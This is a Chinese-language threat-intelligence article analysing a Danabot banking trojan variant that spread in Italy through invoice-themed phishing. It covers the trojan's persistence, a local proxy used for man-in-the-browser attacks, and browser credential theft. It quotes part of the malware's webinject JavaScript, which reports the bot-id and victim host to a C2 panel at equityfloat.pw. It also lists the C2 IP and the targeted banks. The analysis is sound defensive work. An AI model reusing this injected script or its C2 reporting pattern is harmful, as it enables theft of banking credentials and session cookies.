尽管 Proofpoint 和 Eset 等安全公司早在今年5月份就曾针对在澳大利亚传播的Danabot样本进行了全面的分析,但就在过去的几周里,一个新的Danabot变种再次袭击了意大利。在这篇文章中,Cybaze-Yoroi ZLab将对最近通过以“fattura(发票)”为主题的网络钓鱼电子邮件(例如, N051118 )在意大利传播的Danabot变种之一进行剖析。值得注意的是,这个变种滥用了包含嵌入式宏的Word文档来下载恶意DLL paylaod。
技术分析首先,这个新的Danabot变种会尝试通过加密的SSL通道连接到远程主机149.154.157.104(EDIS-IT IT),然后下载其他组件并从文件系统中删除自己。与此同时,它还会在“HKLM\SYSTEM\CurrentControlSet\Services”注册表项中设置了一个系统服务。以下注册表项被用于加载位于“C:\ProgramData\D93C2DAC”文件夹中的DLL,该文件夹被配置为“只读”和“隐藏”。
图1.恶意软件创建的注册表项
图2. D93C2DAC文件夹
这个隐藏文件夹包含两个处于执行中的组件:“D93C2D32.dll”和“D93C2D64.dll”。实际上,它们是两个完全相同的组件,区别在于一个是32位,一个是64位。显然,它们是针对不同体系机构的目标主机设计的,但都通过rundll32.exe进程执行。
也就是说,恶意DLL至少会被加载两次(一次加载D93C2D32.dll,一次加载D93C2D64.dll),且每次的参数都不同,具体取决于要导出的函数(针对不同体系机构的目标主机):
图3.恶意DLL导出的函数
图4.恶意软件的执行示例
如图3所示,恶意DLL最终会导出8个关键函数:“f1”、“f2”、“f3”、“f4”、“f5”、“f6”、“f7”和“f8”。其中,“f1”被用于将恶意软件安装到目标主机中,而“f4”和“f5”则被用于实现持久性。具体来说,“f5”被用于在本地端口1080上设置一个系统转发代理。如此一来,目标主机与Internet之间的所有通信都将通过代理进行,使得恶意软件能够拦截和篡改网络流量。相对应的,“f4”被用于管理流量并执行Man-In-The-Browser攻击。如此一来,从目标主机到Internet的所有DNS呼叫都将被篡改,以与恶意软件中硬编码的银行网站列表相匹配。恶意软件会在原始页面中添加了一段javascript代码,以窃取用户名、密码和会话cookie等敏感信息。
图5.执行中的监听代理
在执行上述函数的过程中,恶意软件还会搜索存储在已安装Web浏览器(如Google Chrome和Mozilla Firefox)数据文件夹中的敏感信息,如保存的凭证。然后,它会将收集到的凭证存储在位于“C:\windows\TEMP”路径下的一个临时SQLite数据库中。
图6.带有被盗凭证的临时SQLite数据库
Man-In-The-Browser攻击为了能够执行Man-In-The-Browser攻击,恶意软件设置了一个系统转发代理,如图7所示。通过这种方式,它能够检查所有传入和传出的internet流量。当受害者访问任意一个目标网站的特定网页时,恶意软件都会将一段自定义javascript代码注入该页面,以窃取敏感的用户信息,如个人详细信息、凭证和PAN码。如上所述,这个代理是由恶意DLL的“ f4 ”函数负责管理的。
图7.代理设置
图8.恶意软件的代码片段
通过对恶意软件样本源代码的分析,Cybaze-Yoroi ZLab得到了其目标网页的完整列表。从这份列表来看,该恶意软件针对的是各种金融机构的客户,且大多数都是意大利银行的客户,如Bancoposte、Intesa San Paolo、Banca Generali、BNL、Hello Bank、UBI Banca等。除了银行网站之外,恶意软件还针对了一些电子邮件服务提供商,如Tim、Yahoo、Hotmail、GMail等国际通用的电子邮件服务,以及与 Tecnocasa等意大利房地产公司相关的其他更具体的电子邮件服务。
图9.没有被注入脚本的银行网站
图10.被注入脚本的银行网站
Web-Inject 被注入网页的恶意javascript会将被盗信息发送给C2,包括受害者的会话cookie。如下代码片段是从“ http://equityfloat[.]pw/hc/myjs28frr_s51.js”下载的webinject代码。
图11.从equityfloat[.]pw C2下载的javascript
这段Webinject代码被用于检查恶意php资源“/my9rep/777.php”,以及将包括bot-id在内的受感染主机详细信息和当前会话cookie发送给C2。
var wwww = 'https://equityfloat.pw/';
wwww = "https://" + document.location.host + "/";
var waitdiv = "<center id=\"fkwt\" class=\"fkwt\"> <br/> Poczekaj a Twój komputer zostanie zidentyfikowany. Moe to potrwa troch czasu... <br/><img src=\"" + wwww + "/my9rep/777.php?imgto=wait\"></img></center>";
var waitfk = "";
var waitlok = "<div><center> <br/> Prowadzone sa prace modernizacyjne w celu jak najszybszego przywrocenia dzialania systemu.<br/>Przyblizony czas modernizacji wynosi kilka godzin.<br/>Przepraszamy za tymczasowe utrudnienie i niedogodnosci.<br/><center></div>";
var netbot = "frr";
var rem777bname2 = "";
var tbid = my7ajx("#myjs1[data-botid]");if (tbid.length > 0) rem777bname2 = tbid.attr("data-botid");
var loca = location.href;
var tyyp = true;
var apan = wwww + "/my9rep/777.php?typ=" + document.location.host + "&sub=" + netbot + "&b=2&inf=" + rem777bname2;
var args = {};
var tmp1;
var tkstate = 1;
var lg = "",
ps = "",
tk = "";
var lgf;
var pss;
var tabl;
var tabltr;
var btn;
var clickfnc;
var ansq = false;
需要指出的是,该恶意软件使用了一个自定义的JQuery脚本“var tbid=my7ajx(“#myjs1[data-botid]”);”来设置受感染主机的bot-id,而这个bot-id与C2 “equityfloat.]com”php页面的路径联系在一起。 var apan = wwww + "/my9rep/777.php?typ=" + document.location.host + "=" + netbot + "&b=2&inf=" + rem777bname2;通过这种方式,攻击者可以获知MitB代理是否注入成功。
总结在过去的一年里,Danabot已经将其活动范围扩大到了意大利,尤其是在今年11月份(例如, N051118 )期间,Cybaze-Yoroi ZLab就拦截了一波大规模的攻击浪潮。从恶意软件样本所针对的目标来看,网络犯罪分子对意大利用户和组织的兴趣正在日益增加,且不仅仅局限于传统的银行业。
声明:本文来自黑客视界,版权归作者所有。文章内容仅代表作者独立观点,不代表安全内参立场,转载目的在于传递更多信息。如需转载,请联系原作者获取授权。
